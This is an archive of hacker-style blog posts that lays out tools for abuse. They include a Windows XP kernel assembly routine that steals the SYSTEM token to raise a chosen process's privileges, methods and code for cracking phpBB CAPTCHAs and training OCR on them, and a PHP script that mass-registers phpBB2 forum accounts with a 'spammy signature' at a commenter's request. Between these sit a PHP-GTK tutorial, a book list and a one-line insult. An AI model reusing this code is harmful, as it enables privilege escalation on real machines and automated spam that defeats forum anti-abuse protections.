PHPBB3 Captcha is super easy

PHPbb3 Captcha 2

A while back I presented a long-winded algorithm that would crack phpBB3 captchas. However, I cracked it a while back and it’s even simpler than I said before. My flood fill routine returns the size of the area it colours in. Soooo… I flood fill background-coloured pixels, and if the filled area is small we assume it must be part of a letter and keep it. That gives us lots of small segments to join together.
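The original routine isn’t shown here, so this is only a minimal sketch of a flood fill that reports the area it coloured in. It works on a plain 2D array of colour values rather than a real image, and the name flood_fill_area is made up for illustration.

```php
<?php
// Hypothetical helper, not the routine from the post: 4-way flood fill on a
// 2D array of colour values ($grid[$y][$x]). It recolours the connected
// region containing ($x, $y) and returns how many pixels it changed.
function flood_fill_area(array &$grid, $x, $y, $newColour)
{
    $height = count($grid);
    $width = $height > 0 ? count($grid[0]) : 0;
    if ($x < 0 || $y < 0 || $x >= $width || $y >= $height) {
        return 0;
    }

    $target = $grid[$y][$x];
    if ($target === $newColour) {
        return 0; // nothing to do, and avoids looping forever
    }

    $area = 0;
    $stack = array(array($x, $y));
    while (!empty($stack)) {
        list($cx, $cy) = array_pop($stack);
        if ($cx < 0 || $cy < 0 || $cx >= $width || $cy >= $height) {
            continue;
        }
        if ($grid[$cy][$cx] !== $target) {
            continue;
        }
        $grid[$cy][$cx] = $newColour;
        $area++;
        // visit the four direct neighbours
        $stack[] = array($cx + 1, $cy);
        $stack[] = array($cx - 1, $cy);
        $stack[] = array($cx, $cy + 1);
        $stack[] = array($cx, $cy - 1);
    }

    return $area;
}
```

Comparing the returned area against a size threshold (a value you would have to tune yourself) is what separates small enclosed regions from the big open background.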

Incidentally, we find the background colour by reading the pixels along the top and taking the most frequently occurring colour.
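A rough sketch of that background check, assuming the image has already been read into a 2D array of colour values (with GD you could fill such an array using imagecolorat). The function name background_colour is hypothetical.

```php
<?php
// Hypothetical helper: return the colour value that appears most often in
// the top row of a 2D pixel array ($grid[$y][$x]).
function background_colour(array $grid)
{
    // colour value => number of times it appears along the top row
    $counts = array_count_values($grid[0]);

    // array_search returns the first key holding the highest count, so on a
    // tie the colour that was seen first in the row wins
    return array_search(max($counts), $counts);
}
```

This only looks at the top row, so it assumes no letter touches the top edge of the picture.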

Now we have some small segments we make them touch each other by blurring them and then we force the picture into only two colours. Then using the average density of vertical lines in each letter we rotate them to an approximately correct position. It may throw a few upside down but as long as that letter always comes out that way up the computer doesn’t care.

Now just train GOCR or a neural network or <<insert cunning program here>> to read those letters. Simple. And surprisingly accurate too. We could further improve it with colour checking routines etc. but hey, it works.

May 12th, 2008, posted by Harry

Google Trips Out

This is totally pointless, but I wasn’t aware that this was actually possible until today.

Google Trips Out

If it looks normal for you then I guess it didn’t work.

May 7th, 2008, posted by Harry

Windows XP Ring 0 Kernel Mode Hacking

So you’ve found a vulnerability in Windows XP that drops you into kernel mode and there you are thinking hehehehe (this is an evil laugh) I can do whatever I want. The only issue is you call win32 function after win32 function only to realise that in ring 0 kernel mode you can’t do dick. After the tenth reset of your PC you realise that you have to be in ring 3 to actually run any proper code. So you play around and you find out that you can modify memory and change a few strings. Ohhhh, the power! You can change some strings. This is pointless.

You read up on some kernel mode functions and you find out that the SYSENTER and SYSCALL commands can be used to enter some kernel functions that will give you basic disk access. However if you use the wrong command on the wrong processor it will probably crash. It’s a start but it’s a heck of a lot of code checking for the correct processor type and then actually to get it to do anything useful. You can’t just access files in the normal way and you can bet if we try and allocate some heap memory it will… crash… again. And then you think yep, of course it will, heap memory allocation is carried out by win32 api functions which run in ring 3 user mode. Fuck it!

So here’s the answer. It took me ages to find this and get it to compile. At fs:[0×124] in windows xp there just so happens to be an array. I forget exactly how it’s laid out but it has all the processes running in it along with… the user running the process. By default there is normally two users at least. SYSTEM and the current running user. SYSTEM has full access to everything. I like the sound of that. Now process number ID 4 in windows xp is always running as SYSTEM. As long as we know the process ID of a process we would like to run as SYSTEM we can just copy the user ID token into our preferred process. Here it goes, my compiler wouldn’t accept all the comments, and I’ve had to put them back…:

pushad

; get the start of the structure into eax
mov eax,dword ptr fs:[0×124]
mov eax,[eax+0×44]
push eax

s1:
mov eax,[eax+0×88]
sub eax,0×88
; Process ID 4 has the SYSTEM privilege token
cmp [eax+0×84],4
; if this process isn’t ID 4 check the next one
jne s1

; rip out the SYSTEM token
mov edi,[eax+0xC8]
and edi,0xfffffff8

; this assumes we are running a c program with a integer called elevpid
mov ebx, _elevpid

s2:
; keep moving down the process list
mov eax,[eax+0×88]
sub eax,0×88
; this is our process id we want to be SYSTEM
cmp [eax+0×84],ebx
jne s2

; copy the user token into our own process
mov [eax+0xC8],edi

pop eax

popad

Oh yeah and don’t enter the wrong process ID into this. It will keep scanning through memory until it runs out of memory to scan. And ring 0 is really not a place you want to get stuck in an infinite loop.

April 29th, 2008, posted by Harry

PHP GTK 2

Last time I said I would be writing a Java application. My idea was take some of these php scripts and group them into something that is easier to use for beginners that runs on the desktop.

However… I got to thinking. I said PHP is a powerful language, and is the only language you really need to write some truly powerful applications. So I’m going to write a PHP application that runs not from a web server or the command line but starts up a proper window.

OK, so let’s get to this. You need:

Glade (to design the window)
GTK+ windows runtimes (unless you run Linux)
PHP 5 with php_gtk2 extension
My PHP GTK scripts (extract them into the same directory as the php 5 install and then double click start.bat)

You got all those? OK, fire up Glade and create a window that is to your liking, like mine below. It will save as something.glade, which is some XML describing the window.

PHP GTK2 App

Now this is the PHP to create a window… I call it glade_win.php

<?php

// load php gtk2 in
if (!extension_loaded('php_gtk')) {
    if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
        dl('php_gtk2.dll');
    } else {
        dl('php_gtk2.so');
    }
}

// load the window from our glade .xml file
$glade =& new GladeXML(dirname(__FILE__) . "/wndMain.glade");

// make sure the window closes when we click close
$glade->get_widget('wndMain')->connect_simple('destroy', array('Gtk', 'main_quit'));

// execute the gtk main function
gtk::main();

?>

This couldn’t be any more simple. The first bit is necessary to load the DLL in because when it runs on my Linux install it destroys my web server if it has php_gtk2 turned on by default.

The next part creates an object that loads in the XML. We then connect the close button i.e. the cross at the top right hand corner to a quit routine, and then gtk::main(); runs the necessary code to view the window.

My window XML is in my scripts zip. It should give an idea of where I am going with this :D . Hopefully that all worked smoothly for you.

April 23rd, 2008, posted by Harry

Book List

Before I post my next post I’m going to make a little list of books which I think are amazing reading.

Persuasion
==========

I find this stuff amazing. There’s only one book I recommend, but here’s why. It’s literally a study of the way people react in very similar situations with perhaps a small change to the way you phrase something, with statistics on the differing reactions of groups of people to the new phrase. For instance, the foot-in-the-door technique is the process of making a small request, such as asking someone to sign a piece of paper to show they would support the local blood bank, and then asking if they would now be interested in donating blood. On average it is likely to increase the response rate by around 10% compared with asking the second question only. This is the type of thing this book is about.

Sales/Marketing
===============

I think learning this stuff is essential if you’re doing anything PPC or generally advertisement related. And it’s also extremely interesting.

I recommend this book for the simple reason that the guy who wrote it sold over 20 million pairs of BluBlocker sunglasses. He must know something about his trade. I’ve read some reviews of this book by people saying it’s only good for direct response. They’re right, but PPC and the web are very similar to direct response marketing. Now you could walk into PPC or advertising totally blind, without a clue what you’re doing, and pick everything up as you go along, but when you’re putting hundreds of dollars of your own money on the line you’ll admit that’s a little more than scary? In this book Joseph Sugarman writes about his experiences in producing effective sales copy, which should give you a good grounding. Most of the reviews of this book praise it pretty highly.

Coding Techniques
=================

These are intense reading about very defined topics. You’re going to need a ton of caffeine but I’d be amazed if you don’t come away feeling like you’ve truly learned something. (At the moment there is only one in this section but I will probably add more :D )

Natural Language Processing is extremely interesting because it involves the computer attempting to give the impression of being able to talk as if it understood the world it is trying to describe. http://en.wikipedia.org/wiki/Natural_language_processing explains the basics of it. The fundamentals of natural language generation involve taking some basic information and forming a natural-sounding sentence from it. To do this we can use statistics to analyze the probability of a word appearing after a word or set of words. There are Markov classes on the Internet which use basic statistics to rewrite content. It’s a complicated subject by any measure.
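To make the “probability of a word appearing after a word” idea concrete, here is a minimal sketch that counts word pairs in a text and turns the counts into a probability. It is not taken from any of the Markov classes mentioned above; both function names are made up for illustration.

```php
<?php
// Hypothetical helper: count how often each word is followed by each other
// word. Returns $counts[$word][$nextWord] = number of times seen.
function build_bigram_counts($text)
{
    $words = preg_split('/\s+/', strtolower(trim($text)), -1, PREG_SPLIT_NO_EMPTY);
    $counts = array();
    for ($i = 0; $i + 1 < count($words); $i++) {
        $current = $words[$i];
        $next = $words[$i + 1];
        if (!isset($counts[$current][$next])) {
            $counts[$current][$next] = 0;
        }
        $counts[$current][$next]++;
    }
    return $counts;
}

// Hypothetical helper: estimated probability that $next follows $word,
// based purely on the counts above (0.0 if $word was never seen).
function next_word_probability(array $counts, $word, $next)
{
    if (!isset($counts[$word])) {
        return 0.0;
    }
    $total = array_sum($counts[$word]);
    $hits = isset($counts[$word][$next]) ? $counts[$word][$next] : 0;
    return (float) $hits / $total;
}
```

For the text “the cat sat on the mat the cat ran”, “the” is followed by “cat” twice and “mat” once, so the estimate for “cat” after “the” is 2/3.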

PHP Newbies
===========

If you are new to coding I suggest you only learn one language, PHP. With PHP you will be able to do almost everything you will ever need to and you will be able to write powerful database applications on the web as well as write scripts that run on your own desktop. I think there is only one way to learn to code. Promise yourself to write a little script and work on it until you pull it off. A book is useful to grasp the basics and act as a reference so you don’t have to google every two minutes.

Social Engineering
==================

How to break through many impenetrable security systems with simple phone calls. Certainly makes you think. The whole of the book describes building trust with members of staff by gaining different small pieces of information from different departments/staff until the sum of that information supplies you with enough credibility that they will believe you are who you say you are. I don’t recommend or do any of this :D it’s just an interesting read.

Next post will be the Java thing.

April 17th, 2008, posted by Harry

Instant GOCR Training

A while back I said you *may* be able to train GOCR to recognise PHPBB2 captchas instantly thanks to its excellent database layout. Now for the moment of truth. Several hours later after travelling through much shrubbery with only my trusty whip and bent fedora for company (I think I may be insane but I don’t have the paper to prove it or the jacket)…

It works. The only downside is that if you fill the database with too many characters it is very likely to slow GOCR down immensely. So go easy, and possibly try to remove excess duplicates of the same letter.

So here’s how it works, inside the custom database directory is a file called db.lst. This file is literally just a list of pictures with their correct answer as seen below (note this is my custom database, normally it names the files sensible names :D ):

30402199be694d0330735cb3de4df778.pbm G
852f04abf55c904fdb977dc297c630ec.pbm Z
1cbc984624ca1673132afead5d6f518a.pbm G
297a35232ba803cd6675a38a29453828.pbm D

The first entry is the filename, and it can literally be any pbm/png file. The second entry is the correct letter. That simple. All we have to do is rip the letters out and put them in the same directory. Unfortunately I haven’t got the script cleaned in a nice easy to use format to just download, but I’ll post what I used to build my custom database very quickly. I use the retrieve.php include which is somewhere on this site. I should be more organised. I think it’s here.
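As a small sketch of that file layout, assuming only the “filename, space, letter” format described above, the following reads the contents of a db.lst into an array and counts how many samples each letter has (handy for spotting too many duplicates). Both function names are hypothetical.

```php
<?php
// Hypothetical helper: parse db.lst contents into filename => letter.
// Assumes one "filename letter" pair per line, separated by whitespace.
function parse_db_list($contents)
{
    $entries = array();
    foreach (preg_split('/\R/', $contents) as $line) {
        $line = trim($line);
        if ($line === '') {
            continue; // skip blank lines
        }
        $parts = preg_split('/\s+/', $line, 2);
        if (count($parts) !== 2) {
            continue; // skip lines that have no answer column
        }
        $entries[$parts[0]] = $parts[1];
    }
    return $entries;
}

// Hypothetical helper: letter => number of sample images for that letter.
function letter_counts(array $entries)
{
    return array_count_values($entries);
}
```

Typical use would be something like parse_db_list(file_get_contents("data/db.lst")), where the path is whatever your own database directory is.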

Now this code is written to run on Windows/Linux so it uses png files because we can’t export pbm files from GD in php. It was either that or have the script not work in Windows at all. All you Linux folks can easily convert them to pbm files and do it the way it’s supposed to be done. (The script runs from the command line only… like this… “php script.php answer.txt captcha.png”) (Also I just thought… Make sure you have the directory ‘data’ in the same directory as you run the script. Don’t run the script from the ‘data’ directory but the directory just above it)

<?php

require_once("retrieve.php");

// extract the letters out
$letters = get_letter_array($argv[$argc-1]);

// get the answer to the captcha
$fp = fopen($argv[$argc-2], "r") or die("Need a solved answer in " . $argv[$argc-2]);
$str_answer = fgets($fp);
fclose($fp);
$answer = str_split($str_answer);

// give them unique names and save them in .png format
$unique_name = array();
for($index=0; $index<count($letters); $index++)
{
    $unique_name[] = md5(uniqid());
    imagepng($letters[$index], "data/" . $unique_name[$index] . ".png");
}

// link them from the db.lst file
$fp = fopen("data/db.lst", "a");
for($index=0; $index<count($letters); $index++)
{
    fwrite($fp, $unique_name[$index] . ".png " . $answer[$index] . "\n");
}
fclose($fp);

?>

And now for some link love to the spamhuntress.

I actually have a plan in mind for my next post, which is damn unusual. I’ll let you know how it goes in several days’ time :D . Oh yeah, and it’ll be in Java so it’ll run nicely on your Windows install too.

April 16th, 2008, posted by Harry

An idea I once had

I don’t have the skills to set this up myself as it’s a large project and I don’t know how you’d go about setting up an open source project on this scale. However, here’s the idea anyway.

Have you ever used the ALICE bot? I think it’s pretty amazing yet ridiculously simple. Literally anyone who knows basic English can make his own. And that’s my idea. A website like wikipedia based on user input that is moderated so that people all work together putting in a little time to make many different personality bots for a game. Then we get some open source coders to add the finishing touches to the game like the GUI. Sure it might not make money but hopefully it’d push the boundaries of games in the future. I don’t know. Good idea?

April 12th, 2008, posted by Harry

Forum registration

I get a message in my comments:

“BTW? have you got the rest of the scripts you need to use your captcha breaking code? i.e. the forum spam stuff?”

Don’t think I’m not listening :D . So here we go, a script that will register at a phpBB2 forum. It works automatically for Linux if you run it from the command line. I know half of you probably use Windows but it’s such a pain trying to port code and the necessary code is in my guest post on BlueHatSeo.com.

The workings behind the functions are stored in regfunctions.php, and you use the script by either running “php regphpbb2.php” or navigating to it in your browser if you’re on Windows.

Anyway at the top of the code is our list of variables that we can change for registering at different forums.

<?php

require_once(”regfunctions.php”);

// set our sign up variables like username and so on
$sign_user = “user”;
$sign_email = “test@test.localhost”;
$sign_pass = “aaa”;
$sign_sig = “My spammy signature”;
$site_name = “http://localhost/phpBB2/”;

Now we download the captcha and if we’re running inside a browser we show the captcha to the user, otherwise we run our C program to crack it.

// make sure we haven’t already sent an answer to our captcha
if(!isset($_GET[’captchacode’]))
{
// begin to register an account this will save the captcha to downloadedcaptcha/captcha.png
// it will return a necessary session/confirm id we’ll need later
$ids = get_register_captcha($site_name);
$sid = $ids[0];
$cid = $ids[1];

// crack the captcha or get a human to solve it
if(!isset($_SERVER[’_']))
{
// if we are running in a web page show the captcha to the user
echo “<h2>PHPBB2 Captcha</h2> You can crack this automatically by running this script from the command line in Linux with ImageMagick libraries installed.<br />”;

echo “<img src=’downloadedcaptcha/captcha.png’ /><br />”;
echo “<FORM action=’” . $_SERVER[’PHP_SELF’] . “‘ method=’GET’>”;
echo “Type in the code <input type=’text’ size=’15′ name=’captchacode’ /><br />”;
echo “<input type=’hidden’ name=’sid’ value=’” . $sid . “‘ />”;
echo “<input type=’hidden’ name=’cid’ value=’” . $cid . “‘ />”;
echo “<input type=’submit’ value=’submit answer’ />”;
echo “</FORM>”;

exit(1);
}
else
{
// if we are running from the command line solve it in code
echo “Solving captcha…\n”;
$solved_captcha = str_replace(” “, “”, exec(”./cleanpic downloadedcaptcha/captcha.png”));
$solved_captcha = str_replace(”\n”, “”, $solved_captcha);
}
}

// if we have a solved captcha put it in the correct variable
if(isset($_GET[’captchacode’]))
{
$solved_captcha = $_GET[’captchacode’];
$sid = $_GET[’sid’];
$cid = $_GET[’cid’];
}

The important bit here is the $solved_captcha = exec(”./cleanpic… ) part. exec allows us to run a program and return its output, in this case our cracked captcha. You need to replace this program with its Windows version if you are running Windows. The str_replace around the call to exec is just to clean the string up in case it sends back a string with spaces or carriage returns. Now we just send some post variables to the server with all the necessary data.

// finish the sign up
$success = sign_up($sid, $cid, $solved_captcha, $site_name, $sign_user, $sign_email, $sign_pass, $sign_sig);

if($success)
echo “account created\n”;
else
echo “account failed to be created\n”;

// now verify the email, note: this is a stub, no code in it
// gotta write it yourself :D
verify_email();

?>

I haven’t written in the email verification code but you don’t always need it for phpBB2. It’s dependent on the mail server you use anyway.

How do you work these scripts out? I have a trick :D . LiveHTTP Headers for Firefox. Take a look below. I register first manually and it prints out everything I need to send to the server to register automatically next time.

LiveHTTP headers

The highlighted part (click to zoom in) is all the post variables that allow us to register. Just exchange them for our own variables. From here it’s pretty simple to add on the pieces that post messages on the forum.

Forum Registration Code

April 11th, 2008, posted by Harry

Letter Derotation

I’m getting kind of done with captchas but here goes another post on them. You may have read Slightly Shady SEO about how to derotate letters. Here’s my easier technique. Add up all the black in each vertical line (column) of the letter, find the average and then check for spikes above that average. These spikes are probably vertical strokes in the letter, like the back of a ‘d’ or a ‘p’ etc. Then we simply rotate the letter by a few degrees at a time until we find the rotation with the largest vertical spike above the average. We then need some extra checks for symmetry and so on, but that’s the basics.
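Here is a minimal sketch of the spike scoring, assuming each candidate rotation has already been turned into a 2D array where 1 is black and 0 is background (producing the rotated candidates, for example with GD’s imagerotate, is left out). The function names are made up, and the symmetry checks are not included.

```php
<?php
// Hypothetical helper: sum the black pixels in each column and return how
// far the tallest column rises above the average column.
function vertical_spike_score(array $letter)
{
    $width = count($letter[0]);
    $columns = array_fill(0, $width, 0);
    foreach ($letter as $row) {
        foreach ($row as $x => $pixel) {
            $columns[$x] += $pixel;
        }
    }
    $average = array_sum($columns) / $width;
    return max($columns) - $average;
}

// Hypothetical helper: given angle => rotated letter grid, return the angle
// whose grid has the largest vertical spike (first one wins on a tie).
function best_rotation(array $candidates)
{
    $bestAngle = null;
    $bestScore = -INF;
    foreach ($candidates as $angle => $grid) {
        $score = vertical_spike_score($grid);
        if ($score > $bestScore) {
            $bestScore = $score;
            $bestAngle = $angle;
        }
    }
    return $bestAngle;
}
```

A straight vertical stroke piles all its black into one column and scores high, while the same stroke leaning over spreads across several columns and scores low.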

April 5th, 2008, posted by Harry

OK Cool

U R Gay

April 2nd, 2008, posted by Harry